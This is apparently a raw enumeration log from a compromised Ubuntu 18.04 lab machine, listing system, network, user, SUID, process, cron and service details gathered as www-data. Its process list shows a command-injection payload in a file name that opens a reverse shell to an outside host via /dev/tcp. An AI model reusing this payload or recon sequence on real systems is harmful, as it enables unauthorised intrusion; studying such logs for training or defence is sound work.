System/Kernel
www-data@ubuntu:/$ uname -a ; cat /etc/*release
Linux ubuntu 4.15.0-134-generic #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
4.15.0-134-generic
x86_64
Ubuntu 18.04.5 LTS (Bionic Beaver)
Networks
www-data@ubuntu:/$ ip route ; arp -a
default via 192.168.104.254 dev ens192 proto static
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.104.0/24 dev ens192 proto kernel scope link src 192.168.104.131
_gateway (192.168.104.254) at 00:50:56:9e:fc:4d [ether] on ens192
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
www-data@ubuntu:/$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:35115 0.0.0.0:* LISTEN -
tcp 0 141 192.168.104.131:33736 192.168.45.218:6000 ESTABLISHED 4155/bash
tcp 0 0 192.168.104.131:33658 192.168.45.218:6007 ESTABLISHED 4139/bash
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 127.0.0.1:39037 127.0.0.53:53 ESTABLISHED -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:35115 0.0.0.0:* LISTEN -
Users & Groups
www-data@ubuntu:/$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
hackzzdogs:x:1000:1000::/home/hackzzdogs:/bin/sh
total 12K
4.0K drwxr-x--x 2 hackzzdogs hackzzdogs 4.0K Feb 3 2021 hackzzdogs
4.0K drwxr-xr-x 3 root root 4.0K Jan 26 2021 .
4.0K drwxr-xr-x 23 root root 4.0K Jan 26 2021 ..
hackzzdogs
www-data@ubuntu:/$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=1000(hackzzdogs) gid=1000(hackzzdogs) groups=1000(hackzzdogs)
uid=1000(hackzzdogs) gid=1000(hackzzdogs) groups=1000(hackzzdogs)
SUIDs
www-data@ubuntu:/$ find / -type f -perm -04000 -ls 2>/dev/null
267552 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
262636 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
792461 112 -rwsr-xr-x 1 root root 113528 Nov 19 2020 /usr/lib/snapd/snap-confine
266445 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
262569 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
277605 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
265285 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
265282 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
263817 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
265284 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
277604 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
265430 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
265350 148 -rwsr-xr-x 1 root root 149080 Sep 23 2020 /usr/bin/sudo
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
265281 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
275555 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
266192 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
266190 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
265155 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
262177 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
SGIDs
www-data@ubuntu:/$ find / -type f -perm -02000 -ls 2>/dev/null
409436 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
276916 44 -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
266374 356 -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
275510 16 -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
265280 72 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
262311 40 -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
265283 24 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
263772 32 -rwxr-sr-x 1 root tty 30800 Sep 16 2020 /usr/bin/wall
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
524296 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/pam_extrausers_chkpwd
524315 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/unix_chkpwd
Capabilities
www-data@ubuntu:/$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
Processes
www-data@ubuntu:/$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.7 77864 7208 ? Ss 17:59 0:01 /sbin/init
root 502 0.0 0.8 94948 8628 ? S<s 17:59 0:00 /lib/systemd/systemd-journald
root 508 0.0 0.1 97716 1392 ? Ss 17:59 0:00 /sbin/lvmetad -f
root 520 0.0 0.5 46960 5240 ? Ss 17:59 0:00 /lib/systemd/systemd-udevd
systemd+ 577 0.0 0.1 141964 1880 ? Ssl 17:59 0:00 /lib/systemd/systemd-timesyncd
systemd+ 600 0.0 0.3 70672 3548 ? Ss 17:59 0:00 /lib/systemd/systemd-resolved
root 737 0.0 0.7 91164 7820 ? Ss 17:59 0:00 /usr/bin/VGAuthService
root 738 0.0 0.6 227056 6416 ? S<sl 17:59 0:04 /usr/bin/vmtoolsd
daemon 748 0.0 0.2 28340 2220 ? Ss 17:59 0:00 /usr/sbin/atd -f
root 751 0.0 0.2 629076 2600 ? Ssl 17:59 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 752 0.0 0.3 263044 3916 ? Ssl 17:59 0:00 /usr/sbin/rsyslogd -n
root 753 0.0 0.5 287540 5536 ? Ssl 17:59 0:00 /usr/lib/accountsservice/accounts-daemon
root 761 0.0 0.2 31328 2500 ? Ss 17:59 0:00 /usr/sbin/cron -f
root 762 0.0 1.2 170400 12432 ? Ssl 17:59 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
message+ 764 0.0 0.4 50152 4044 ? Ss 17:59 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 839 0.0 0.4 62168 4468 ? Ss 17:59 0:00 /lib/systemd/systemd-logind
root 840 0.0 2.9 673628 29400 ? Ssl 17:59 0:01 /usr/bin/containerd
root 861 0.0 1.3 187244 14068 ? Ssl 17:59 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 862 0.0 0.5 288888 5700 ? Ssl 17:59 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1102 0.0 5.5 839324 55680 ? Ssl 18:01 0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1156 0.0 0.4 72308 4164 ? Ss 18:01 0:00 /usr/sbin/sshd -D
root 1157 0.0 0.1 16188 1600 tty1 Ss+ 18:01 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1194 0.0 0.3 125272 3656 ? Ss 18:01 0:00 /usr/sbin/apache2 -k start
www-data 1195 0.0 4.3 729144 44328 ? Sl 18:01 0:08 /usr/sbin/apache2 -k start
www-data 1196 0.0 1.0 881928 10488 ? Sl 18:01 0:00 /usr/sbin/apache2 -k start
www-data 1197 0.0 1.3 898160 13308 ? Sl 18:01 0:00 /usr/sbin/apache2 -k start
root 1469 0.0 0.2 404808 2548 ? Sl 18:01 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 27017 -container-ip 172.17.0.2 -container-port 27017
root 1475 0.0 0.2 9364 2652 ? Sl 18:01 0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/85b45169ebbfc0914668fe706828e6f845d143379e73baabcb9e166e9cda08b1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
999 1491 0.2 8.9 1585412 90600 ? Ssl 18:01 0:20 mongod --bind_ip_all
systemd+ 1838 0.0 0.3 72028 3732 ? Ss 18:01 0:00 /lib/systemd/systemd-networkd
www-data 4136 0.0 0.0 4636 816 ? S 20:20 0:00 sh -c /bin/bash -c 'rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6007 0>&1)'
www-data 4137 0.0 0.3 18384 3112 ? S 20:20 0:00 /bin/bash -c rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6007 0>&1)
www-data 4139 0.0 0.3 18516 3388 ? S 20:20 0:00 bash -i
www-data 4152 0.0 0.0 4636 832 ? S 20:23 0:00 sh -c /bin/bash -c 'rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6000 0>&1)'
www-data 4153 0.0 0.2 18384 3020 ? S 20:23 0:00 /bin/bash -c rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6000 0>&1)
www-data 4155 0.0 0.3 18516 3516 ? S 20:23 0:00 bash -i
www-data 4249 0.0 0.3 36708 3208 ? R 20:31 0:00 ps -auxwww
root 761 0.0 0.2 31328 2500 ? Ss 17:59 0:00 /usr/sbin/cron -f
root 840 0.0 2.9 673628 29400 ? Ssl 17:59 0:01 /usr/bin/containerd
root 862 0.0 0.5 288888 5700 ? Ssl 17:59 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1102 0.0 5.5 839324 55680 ? Ssl 18:01 0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1469 0.0 0.2 404808 2548 ? Sl 18:01 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 27017 -container-ip 172.17.0.2 -container-port 27017
root 1156 0.0 0.4 72308 4164 ? Ss 18:01 0:00 /usr/sbin/sshd -D
root 1475 0.0 0.2 9364 2652 ? Sl 18:01 0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/85b45169ebbfc0914668fe706828e6f845d143379e73baabcb9e166e9cda08b1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
999 1491 0.2 8.9 1585412 90600 ? Ssl 18:01 0:20 mongod --bind_ip_all
Cron & Systemd
www-data@ubuntu:/$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2025-03-10 02:09:01 UTC 5h 35min left Sun 2025-03-09 18:02:00 UTC 2h 31min ago apt-daily.timer apt-daily.service
Mon 2025-03-10 04:00:00 UTC 7h left Sun 2025-03-09 18:01:55 UTC 2h 31min ago fstrim.timer fstrim.service
Mon 2025-03-10 08:57:55 UTC 12h left Sun 2025-03-09 18:01:55 UTC 2h 31min ago motd-news.timer motd-news.service
Mon 2025-03-10 10:14:32 UTC 13h left Sun 2025-03-09 18:02:01 UTC 2h 31min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-03-10 18:14:49 UTC 21h left Sun 2025-03-09 18:14:49 UTC 2h 18min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
5 timers listed.
Pass --all to see loaded but inactive timers, too.
Services
www-data@ubuntu:/$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
apache2.service loaded active running The Apache HTTP Server
atd.service loaded active running Deferred execution scheduler
containerd.service loaded active running containerd container runtime
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
docker.service loaded active running Docker Application Container Engine
getty@tty1.service loaded active running Getty on tty1
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
docker.socket loaded active running Docker Socket for the API
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
34 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
Sudo Version
www-data@ubuntu:/$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
Sudo version 1.8.21p2
Glibc Version
www-data@ubuntu:/$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27